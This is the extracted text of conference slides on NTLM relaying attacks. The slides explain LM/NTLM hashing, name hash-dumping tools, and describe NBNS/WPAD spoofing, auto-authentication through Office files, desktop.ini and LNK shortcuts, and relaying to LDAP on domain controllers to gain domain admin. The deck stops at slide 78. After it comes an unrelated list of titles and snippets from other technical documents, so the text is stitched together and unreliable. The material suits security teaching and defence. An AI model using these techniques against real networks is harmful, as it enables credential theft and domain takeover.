1 OWNED In 60 Seconds From Network Guest to Windows Domain Admin Directed By Zack Dutchess Fasel
2 We Now Present Your Obligatory Intro
3 What s This Talk About? Weaknesses in NTLM Auth, Specifically NTLM Relaying New techniques to take advantage of these flaws Ways to externally leverage NTLM Relaying Corporate Impact to NTLM Relaying Cool New Shiny Toolset Demo? Let s see... ;) Ways to Protect Yourself and Remediate
4 The Goal?
5 Get Domain Admin (or sensitive data) in 60 seconds or less
6 So Who Are You Zack Fasel on twitter - Codename: Duchess Founder and Managing Partner of Co-Creator and Tech Lead Lead Organizer the party tonight.
8 95 Slides. Let s Get Started
9 So Let s Talk About LM/NTLM
10 The Minute Intro To X X LM/NTLM And All It s Flavors
11 So What Is LM/NTLM Windows Land! Password Hashing Algorithm Network Challenge/Authentication
12 Let s Start With Hashing
13 So Windows Pass Hashes Stored on Local Machine SAM File Local Accounts Memory For Local and Cached Accounts Stored on Domain Controller
14 LM? It s Bad Mmmkay We all know this. And have for years. But we re reviewing. 7 Character Chunks, CAPITALized Pad from 56 to 64 bytes DES Encrypt using Password as key and as the data. Viola. Hash.
15 LM? It s Bad Mmmkay We all know this. And have for years. Hunter2LOL! HUNTER2 / LOL! 93D1F9EA182DF34B / 20069D7FB184D83A
16 So the LaMe Problems? Obviously Easy to Crack now. Rainbow tables - every precomputed possibility in a dictionary Blah blah old news...
17 So How is NTLM Better? MD4(UTF-16(Password)) A Real Hash! Hunter2Hunter2 93D1F9EA182DF34B 93D1F9EA182DF34B DC020E672D09B BC0449B90C7CB
18 Obtaining Hash..es pwdump gsecdump mimikatz hashdump in meterpreter the list goes on...
19 Oh There s So Much More! But we only have an hour...well...50 minutes...or 45 by now...
20 NTLM Network Auth
21 Network Auths Used for various network services SPNEGO Plain Text NTLM Kerberos
22 3 Way Handshake Here It Goes TYPE 1 TYPE 2 TYPE 3 CLIENT SERVER Type 1 - Let s Talk. I Support X...Y...And Z Type 2 - I Support X...Y...And Q. Here s a CHALLENGE (salt) Type 3 - I m Sterling Archer of Isis. Password fx(guest,salt),sig
23 Type 1 - Let s Nego
24 Type 2 - I Challenge You!!
25 Type 3 - The password is...
26 The Flavors and Flags LM - Uses Weak LM Hash NTLM - Uses NTLM Hash NTLMv2 - Uses NTLM Hash with Added Client Chal LMv2 - Uses LM hash with Added Client Chal NTLM2 Signing - We ll Talk about That Later
27 So What s the Problem? You Know, The Security Issues...
28 Pass The Hash, Bro Doesn t require knowledge of the password. Utilizes the password hash to authenticate Requires existing access to obtain hashes (i.e. local admin)
29 But We ve Already Heard about PTH Twice This Con Mubix s Talk and Skip/Chris Talk But what about doing this with no existing access?
30 We Can Relay the Auth NTLM Authenticates the User to the Server, not mutual Remember Types 1 / 2 / 3? So how can we take advantage of this?
31 3 Way Handshake Here It Goes TYPE 1 - NEGO TYPE 2 - CHAL TYPE 3 - AUTH CLIENT SERVER ATTACKER
32 That s the Background Everyone Should be a Windows Auth Expert Now I ll be handing out CWAE Certifications Later
34 Mid Talk Checklist 1) Services Capture Auth 2) Auth Can Be Relayed to Other Services 3)... 4) PROFIT
35 MITM? That s Limited... Introducing Windows Integrated Auth
36 AUTH TO ALL THE THINGS Usability to prevent having to type password in over and over and over and over and over... Windows Auto-Logins to things without prompting
37 So What Ways Do They Auto Auth?
38 HTTP Auto Auth Local Trusted Security Context In Browser, only typically in IE, but can be enabled in FF/Chrome
39 How does Name Lookup? c:\windows\system32\drivers\etc\hosts DNS - name.sub.domain.tld, name.domain.tld NBNS Broadcast
40 NBNS You Say? Broadcast to local network looking for xyz name Spoof responses back (msf aux/spoof/nbns...) Viola, one word names auto auth
41 So I have to SE Someone? NOPE Web Proxy Auto Detect (WPAD) Looks up for proxy settings Auto Authenticates
43 So I have to use IE Systems auto authenticate too! DOMAIN\SYSTEM$ - Member of Domain Computers Even when no one is at the system
45 So Only On The Same LAN Nope Dynamic DHCP hostnames ;) hostname = hostname.sub.domain.tld Or DNS Poisoning...
46 So HTTP Only? Nope. Let s not Forget SMB
47 Browser Pages
48 But No Go in FF/Chrome
49 Until Now
50 But Chrome Is a PITA
51 How about Office Suite Word Doc Referencing UNC paths images Convert HTML file into Word Doc...viola! Excel? Power Point? Sure :)
52 What Else in Office? How about Outlook s Yes, it prompts for opening an image...but it works
53 Let s Extend This Further desktop.ini Files.lnk files
54 So Internally Only? NOPE! :) SMB doesn t respect local security context file://ip.add.re.ss/share/file.ext - Works over Net ;)
55 So Auto Auth via... NBNS Spoofing Browser Pages / HTML Office (Word/Excel/PPT/OUTLOOK) Docs desktop.ini / LNK Shortcuts
56 So What Can I Relay To?
57 HTTP NTLM Auth for HTTP Services
58 SMB We ve been doing this for a while MS08_069 fixed relaying back to source SMB RPC permits ability to execute commands / get shell, but requires admin access
59 LDAP So SMB Signing is forced by default on domain controllers...what can we relay to on the DC? LDAP Doesn t force signing by default! LDAP Supports NTLM Auth... WIN! Note: Can t change passwords unless SSL/Encrypted
60 Others? There s other things that use NTLM auth that permit further research! Remote Desktop VPN Telnet FTP...
61 So Internal Only, Lame Not So Fast...
62 HTTP Externally Sharepoint Servers?
63 People needed Mobiles
64 Exchange...Oh Exchange.. RPC EWS
66 The Pieces Come Together Let s Re-elaborate Impact Though
67 Give Me Some Scenarios You Bet. Here s 3.
68 Internal Employee Desktop.ini on Network Share Wait for admin to view share Admin auto authenticates to an smb share Relay to servers / ldap on domain controller Promote user account to domain admin, add new users
69 Rogue Wifi Rogue DNS + Proxy / NBNS+WPAD Relay to other Rogue Clients on AP or to EWS Om nom nom data
70 External Attacker Social Engineering /Persistent XSS Relay to Exchange Web Services or sharepoint
71 I Heard There s Some Tools Hey, Quit calling me a tool.
72 Existing Tools smb_relay Squirtle! There s a lot more
73 But They Fall Short Relay Everything to One Destination Only HTTP or SMB servers in separate roles No payload generation Limited target surface (i.e. get shell)
74 ZackATTACK! Relaying NTLM Like Nobody Else
75 Overall Design Difference Knows Who the User is before relaying! Rules to relay to unique destinations based on user Utilize limited user access as well as admin
76 So There s 4 Components Servers - Clients - Payloads - Rules
77 Servers SMB HTTP
78 What s Different? Remember type 1/2/3? We don t know user till 3. Challenge is sent in type 2. How do we know the user to send different users different challenges? Track by IP? Won t work Externally Cookies? Only for HTTP and not preserved with WPAD UUID? SMB2 Only
Data protection Protecting personal data in online services: learning from the mistakes of others May 2014 Contents Introduction... 2 What the DPA says... 4 Software security updates... 5 Software security
Trouble Shooting SiteManager to GateManager access If you are unsure if a SiteManager will be able to access the GateManager through the corporate firewall, or you experience connection issues, this document
Load Balancing Exchange 2007 Client Access Servers using Windows Network Load- Balancing Technology In this article I will show you how you can load-balance Exchange 2007 Client Access Servers (CAS) using
Tech Note: TechNote - Deploying CPPM with F5 BIG-IP Local Traffic Manager (LTM) Version Date Modified By Comments 0.1 July 2014 Danny Jump Early Draft Version 0.2 / 0.3 07/11/2014 Con Stathis Added sections
SRA 6.0 User s Guide 1 Notes, Cautions, and Warnings NOTE: A NOTE indicates important information that helps you make better use of your system. CAUTION: A CAUTION indicates potential damage to hardware
Small Business Server Part 2 Presented by : Robert Crane BE MBA MCP email@example.com Computer Information Agency http://www.ciaops.com Agenda Week 1 What is SBS / Setup Week 2 Using & configuring SBS
Installation and Upgrade Guide Copyright Statement Copyright Acronis International GmbH, 2002-2014. All rights reserved. Acronis and Acronis Secure Zone are registered trademarks of Acronis International
BEST PRACTICES FOR SCSP POCS Best Practices for Critical System Protection Proof of Concepts Version 1.0 1 1. UNDERSTANDING SERVER RISK... 4 1.1. HOW TO PROTECT YOURSELF: DEVELOPING SERVER HARDENING CONFIGURATIONS...
Fundamental Principles of Network Security By Christopher Leidigh White Paper #101 Executive Summary Security incidents are rising at an alarming rate every year. As the complexity of the threats increases,
Linux Virtual Server Administration 5.0 Linux Virtual Server (LVS) for Red Hat Enterprise Linux 5.0 ISBN: N/A Publication date: Linux Virtual Server Administration Building a Linux Virtual Server (LVS)
E-mail Filter SurfControl E-mail Filter 5.0 for SMTP Getting Started Guide www.surfcontrol.com The World s #1 Web & E-mail Filtering Company CONTENTS CONTENTS INTRODUCTION About This Document...2 Product
Technical report, IDE1108, March 2011 Mobile One Time Passwords and RC4 Encryption for Cloud Computing Master s Thesis in Computer Network Engineering Markus Johnsson & A.S.M Faruque Azam School of Information
Linux Virtual Server Administration RHEL5: Linux Virtual Server (LVS) Linux Virtual Server Administration: RHEL5: Linux Virtual Server (LVS) Copyright 2007 Red Hat, Inc. Building a Linux Virtual Server
IceWarp Unified Communications Reference Version 11.1 Published on 11/4/2014 Contents... 4 About... 5 The Big Picture... 7 Reference... 8 General... 8 Dial Plan... 9 Dial Plan Examples... 12 Devices...
Loadbalancer.org Appliance Setup v5.9 This document covers the basic steps required to setup the Loadbalancer.org appliances. Please pay careful attention to the section on the ARP problem for your real
IceWarp Unified Communications VoIP Service Reference Version 10.4 Printed on 13 April, 2012 Contents VoIP Service 1 Introduction... 1 The Big Picture... 4 Reference... 5 General... 5 Dial Plan... 7 Dial
SMART MARKETING: UNLOCKING THE POWER OF AUTOMATION A Q&A Session with WhatCounts TABLE OF CONTENTS Introduction 4 Welcome to the Email Automation Q&A 5 What is Smart Marketing? 5 What is email automation?
BT Business Total Broadband User Guide Contents To install your BT Business Hub, follow your handy Quick Start guide. This User Guide contains more detailed set-up and service information, including troubleshooting.
Accessing the WAN Chapter 4 Objectives 2 Security has moved to the forefront of network management and implementation. The overall security challenge is to find a balance between two important requirements:
COMPREHENSIVE INTERNET SECURITY SonicWALL Secure Remote Access Appliances SonicWALL SSL VPN 5.0 User s Guide Table of Contents Using This Guide About this Guide......................................................